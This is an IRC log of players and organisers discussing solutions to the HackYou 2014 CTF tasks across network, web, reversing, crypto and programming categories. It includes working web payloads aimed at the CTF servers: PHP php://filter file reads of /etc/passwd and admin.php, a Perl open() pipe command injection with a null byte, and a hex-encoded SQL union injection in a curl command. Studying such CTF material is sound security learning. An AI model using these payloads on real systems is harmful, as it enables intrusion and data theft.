net100 — PCAP
<rik_> did net100 require any bruteforcing?
<Ymgve> rik_: yes it required bruteforcing but it can be done locally
<rik_> OHH
<rik_> oh blehh
<rik_> i refused to brute it
<rik_> kept thinking i was missing something
<hopeless> net 100 http://www.privatepaste.com/aec6fd41bd
ppc400 — Broken Marquee
<phiber_> NOW TELL ME HOW TO FIND THE GOOD PIXELS
<Ymgve> phiber_: periods
<phiber_> what do you mean periods
<Ymgve> phiber_: looking at one pixel in a marquee, the sequence it will flash in repeats as long as the display shows the same text
<vos> phiber_: if you look at flashing repeat period of every pixel, you'll get 7 values: 0 is like totally random, 1 is an ever-on/off pixel, 45 is this fake one http://img.vos.uz/mbhi.gif, 223 is this fake one http://img.vos.uz/w1fs.gif, 330 is the flag :)
<vos> (also 116, 140, 195 are just random repeating noise)
<phiber_> damn
<phiber_> I found the 45 interval
<kushou> Ymgve: hmm, didn't use that method for ppc400, given the "hello world 123", I made assumptions on the font, then tried to match columns of blanks (spaces between letters), got the bottom 3 lines, then found the 2 by hand
<kushou> (assuming line 1 and 8 are all blanks)
<phiber_> http://i.imgur.com/Kjq5Dgm.png
<phiber_> DAMN
<vos> phiber_: damn
<phiber_> I totally overlooked the 330 interval
<phiber_> thought it was a zero
<phiber_> fuck
<phiber_> the damn ppc400 https://privatepaste.com/f22b59e446
<spq_> what was the intended way for solving broken marquee
<spq_> ?
<Ymgve> spq_: finding periods was probably the intended way
<Ymgve> also parsing the image was a big part of the task
<spq_> had that done but no luck with my analyzing stuff after that
<Ymgve> but then vos decided we were all a bunch of jerks for not attempting it so he gave us the data
net400 — GSMd
<aXs> lol
<aXs> http://codezen.fr/2014/01/15/hackyou-2014-net400-gsmd-sh-write-up/
<vos> my two major fuckups: 1) connecting to port 0 actually worked for HTTPZ; 2) uptime of GSMd could be found from /etc/adjtime
<vos> intended way for GSMd was to use TCP timestamp to estimate uptime
<Ymgve> lol the adjtime wasn't supposed to be there?
<aXs> vos: adjtime is quite off compare to the tcp timestamps
<vos> aXs: but still is a pretty good estimate
<Ymgve> another way: BRUTE FORCE ALL THE TIMESTAMPS
<vos> :D
<vos> Ymgve: hellman solved it that way :)
<vos> he farmed for different hashes for like an hour
<spq_> vos, was there a way to get the uptime without bf?
<vos> spq_: intended way - TCP timestamp field estimation
<Ymgve> spq_: apparently adjtime got roughly the last reboot time and you could get tcp timestamp information
<vos> spq_: shortcut way: look at /etc/adjtime
<Ymgve> stupid way: look at the number of packets sent over lo0
<phiber_> spq_, nmap worked for me, the uptime was accurante with a ~5 minute error
<phiber_> it reported ~73 days uptime
<phiber_> which was like 15~ min close to the timestamp in /etc/adjtime
web400 — PHPwning
<Xelenonz> http://blog.rop.sh/hackyou2014-phpwning-web400/ for web400
<cyberguru> Web400 author's exploit - getting RCE http://pastebin.com/xK53uQ7H
<Ymgve> haha lol wtf web400 was supposed to be solved like that?
<Ymgve> I used GlobIterator to browse the file system
<aXs> Ymgve: GET /index.php?action=SplFileObject¶m=php%3a//filter/read%3dconvert.base64-encode/resource%3dhttp%3a//localhost/admin.php%3fPHPSESSID%3d../var/www/images/fed2d697dfe09bc58dd785eed9027b06 HTTP/1.1
<Ymgve> http://hackyou2014tasks.ctf.su:40080/index.php?action=GlobIterator¶m=/*
<cyberguru> Ymgve: you were lucky, that flag file was first in / directory and you could easily get it using glob:///*
<cyberguru> Ymgve: we need to hide flags deeper :D
<Ymgve> I wonder if it is possible in web400 to exploit the fact that you can spawn a SoapServer with a service description under your control, somehow
<phiber_> I spent hours with soapserver and simplexmlelement
<phiber_> trying to do xxe
<tomcr00se> omg why did the PHPSESSID in the get work?
<tomcr00se> for web400, i was convinced PHP removed that
<cyberguru> tomcr00se: it is custom session handler in "Session" class
<tomcr00se> yea but that doesn't include the id
<tomcr00se> use_only_cookies is 1 by default in PHP > 5.3.0
<spq_> cyberguru: btw. was this intended: http://hackyou2014tasks.ctf.su:40080/index.php?action=GlobIterator¶m=/*
<cyberguru> spq_: nope :)
<spq_> just went through the list of classes existing on my local php installation and found that one which looked good :)
<tomcr00se> you got lucky that it printed the flag first
<spq_> otherwise i would have enumerated the dir
<tomcr00se> how?
<spq_> /A* /B* ...
<tomcr00se> i used DirectoryIterator
<tomcr00se> i still don't understand why PHPSESSID works as a get param
<tomcr00se> http://us3.php.net/manual/en/session.configuration.php#ini.session.use-only-cookies
<cyberguru> tomcr00se: but you could read php.ini
<tomcr00se> oh neat, php://filter/read=convert.base64-encode/resource= probably works
<tomcr00se> lol http://192.168.56.2/index.php?action=SplFileObject¶m=php://filter/read=convert.base64-encode/resource=/etc/passwd
net300 — HTTPZ
<Ymgve> btw, httpz - why does curl on linux fail with some tls error?
<Ymgve> curl on windows (thru a tunnel) works
<vos> Ymgve: httpz - apache seems not to handle port 0 correctly inside Host header
<vos> intended way for HTTPZ was to patch the stack or write a rewrite rule for iptables :<
<Ymgve> lol
<vos> i thought connect to port 0 won't work :D
<vos> like binding 0 does binding to random
<Ymgve> I did curl on windows -> python tunnel script (since netcat didn't work on port 0 by default) and it magically worked
<aXs> patched netcat then openssl s_client to uses port 0, works fine
<Xelenonz> how did you to solve HTTPZ? :D
<Ymgve> Xelenonz: curl from windows through a tcp tunnel into a linux system (that supports port 0)
<phiber_> I used this for httpz http://code.activestate.com/recipes/114642-pinhole/
ppc100 — Trash
<hopeless> so what was the deal with ppc 100
<Ymgve> ppc100 was badly designed
<cyberguru> Ymgve: python "qrcode" module works fine in ppc100
<hopeless> sys.setdefaultencoding("iso-8859-1")
<hopeless> that s needed in pyqrcode
<Ymgve> if anyone else don't want to combat their QR tools, here is the proper zip file stitched together https://mega.co.nz/#!oYsUzbaY!PfE1pxCOEj6lT6CHiLc20wCwpFsdKL5E53g0LO7kV9w
<mathiasbynens> and to recursively extract that zip: while [ -e *.zip ]; do files=*.zip; for file in $files; do echo "$file"; unzip -q "$file"; rm "$file"; done; done
rev300 — Enchanter
<rik_> how did you guys solve enchanted/
<Ymgve> rik_: it's huffman compression
<rik_> Ymgve, how did you even
<phiber_> after a few hours of tracing and writing pseudocode I recognized it was huffman
<Ymgve> which was much easier than I thought at first, because after a not-too-deep look into the code, I thought it was arithmetic encoding
<Ymgve> and fuck that noise
<rik_> i realized that details was storing the distinct bytes and strength was storing their counts
<rik_> but after that i just gave up
<rik_> because there was too much code O_O
<vos> rik_: personally, i didn't reverse the whole thing. just spotted the frequency table and bit-trash on the output. patched the binary to read freq-table from STDIN and gave it the one from task file. fed it 8x \x00, 8x \x01 and so on and looked what bitstreams it spit out. then when i had all the bit-codes, decoded the original file with a script.
<vos> rik_: my rev300 solution dump http://2014.hackyou.ctf.su/files/reverse300_vos.zip
<spq_> btw. enchanter - that one was fun
<spq_> found the freq. table really fast, after some digging, just produced a file with equal char count and looked at the result
<spq_> one could see the patterns very well, scanned that result and produced a pattern -> char list and used it to decompress the original item.enchanted
<Ymgve> I had quite a few problems because the enchanter and I disagreed on which order equal-weighted nodes should be sorted in
<Ymgve> http://pastebin.com/Rjmfap2g - disenchanter that builds the table itself
ppc300 — Captcha Breaker
<__M__> Was ppc300 supposed to be OCR'd? I noticed there was some public temp directory containing intermediate LaTeX files, one could maybe try to race for those...
<phiber_> uh, I solved it using the latex files
<hopeless> most i talked to used ocr
<hopeless> tesseract t be exact
<pdah> I spent few hours to train tesseract
<__M__> Me too.
<pdah> and same amount of time to wait for the flag
<__M__> Used OCR, but without any training.
<pdah> network was so laggy on that day
<__M__> Tesseract + limited charset + some preprocessing.
<__M__> convert cap.png -background white +repage -bordercolor white -border 50x50 +repage -flatten -fill black -draw "rectangle 30,75 93,168" -flatten -sharpen 1 +matte out.tiff && tesseract out.tiff out config batch.nochop
<cyberguru> __M__: you can write your own captcha solver, because character images are equal every time
<phiber_> ppc300 latex mode https://privatepaste.com/be5f5bc397
<__M__> hopeless: https://privatepaste.com/37291ec123 <- perl/tesseract ppc300
<pdah> I think this is what hopeless asked for: http://hackyou2014tasks.ctf.su:30037/ppc300/tmp/
rev400 — Classic
<phiber_> I solved rev400 with pin and instruction counting
<Ymgve> rev400 was just a simple VM, btw
<Ymgve> also not sure if it was intended but I never could get ida to show the stack when connecting to gdbserver on that task
<phiber_> I used instruction counting to solve it
<phiber_> I didn't even debug it
<Ymgve> phiber_: how what
<phiber_> https://privatepaste.com/789edddc0e
<phiber_> like this
<Ymgve> oh haha
<Ymgve> side channel attack
<phiber_> yeah
<phiber_> easy and fast
net200 — Jailbreaker
<Xelenonz> So, what the solution for Jailbreak?
<vos> Xelenonz: expected was to download an OTA update package. it's not encrypted
<vos> i wonder how those two heros did it
<vos> did anyone actually jailbreak his atv3g :)
<spq_> ok, last onw i didnt solve: jailbreaker - dafuq? i dont have an apple tv :/
<vos> spq_: apple handles their firmware with extreme care, all encrypted and shit
<vos> but it doesn't encrypt the Over-the-Air updates. they are available for download freely
<Ymgve> was that sarcasm
<spq_> so what was the task?
<vos> spq_: just grab an OTA update package from say http://theiphonewiki.com/wiki/OTA_Updates and send me any file
<spq_> downloading a file from somewhere and sending to you via mail?
<spq_> oh ^^
<vos> net200: task is to learn about OTA updates :)
<spq_> i thought i have to provide some kind of code also
<tomcr00se> (also if i had a damn appletv here in berkeley i have a jailbreak that'll work, i had my dad plug in into my linux box at home but i was too lazy to port the jailbreak to linux)
ppc200 — Play with me
<hopeless> surprised more people didnt get play with me
<hopeless> here is my code
<hopeless> http://pastebin.com/Lz778D7V
<Ymgve> well I spent hours wondering why the rules were so obtuse
<Ymgve> then realized that the submit format had the coordinates flipped
<Ymgve> x refers to row not column
web200 — Snake
<LongCatTH> how abour snake?
<LongCatTH> I found LFI, but not a flag :/
<Ymgve> the LFI can also be used to run commands
<spq_> flag was in /
<LongCatTH> ahh
<spq_> evil pwerl :)
<Ymgve> you just have to find a clever way to bypass the "does this file exist" check
<spq_> used `$HTTP_USER_AGENT`| as file :)
<spq_> somehow i was unable to use stuff like | < and > - but i could use dd - so i made a mini shell with pieces from the other .pl files :)
<Ymgve> you could also do something like ../../../../../../bin/ls\0|
<Ymgve> but that didn't really help without the ability to specify parameters
<spq_> mainly perls open() with | at the end
<spq_> http://hackyou2014tasks.ctf.su:20080/cgi-bin/index.pl?ip=../../../../../bin/ls%00|
<LongCatTH> still didn't get snake!
<LongCatTH> should I write a file?
<LongCatTH> space seems not allow :x
<spq_> LongCatTH: the file must exist, so e.g. "ls /" does not exist in /usr/bin - so you have to find a way around that, e.g. you create a file with the score upload thingy, that makes the index.pl think the file exists but when open'ing, it instead executes part of it (this goes through the shell so backticks are a good example)
<LongCatTH> thx, that's clever 0.0
cry400 — CRYPTONET
<ircc> any writeup for crypto400? what was the idea?
<rik_> hamstad broadcast attack?
<rik_> hastad*
<spq_> crt
<rik_> yeah essentially ^
<spq_> :)
<spq_> + 17th root
web100 — Voting
<LongCatTH> web100 curl -vvv "http://hackyou2014tasks.ctf.su:10080/" -d "vote=1&submit=&id=0x`echo -n '2 and 1=2 union select flag from task.Flag'|xxd -p|tr -d '\n'`"
cry200 — Hashme
<Xelenonz> crypt200 : https://gist.github.com/xelenonz/f9b72131acc3dbf4de8b just has only my trash file
<hopeless> crypto 200 http://pastebin.com/K5Ay2jha
cry300 — Matrix
<phiber_> anyone did crypto300 in python?
<phiber_> I tried but I wasn't getting the right matrix divisions, so in the end I used octave
<rik_> phiber_, https://privatepaste.com/ea8e7640c0
<phiber_> I was using M.inv instead of linalg.inv(), and A*B instead of A.dot(B)
<phiber_> maybe it was because of that
<rik_> ah
<rik_> A*B isn't proper matrix multiplication
<spq_> phiber_: http://paste.ubuntu.com/6758450/ (python crypto300 solution)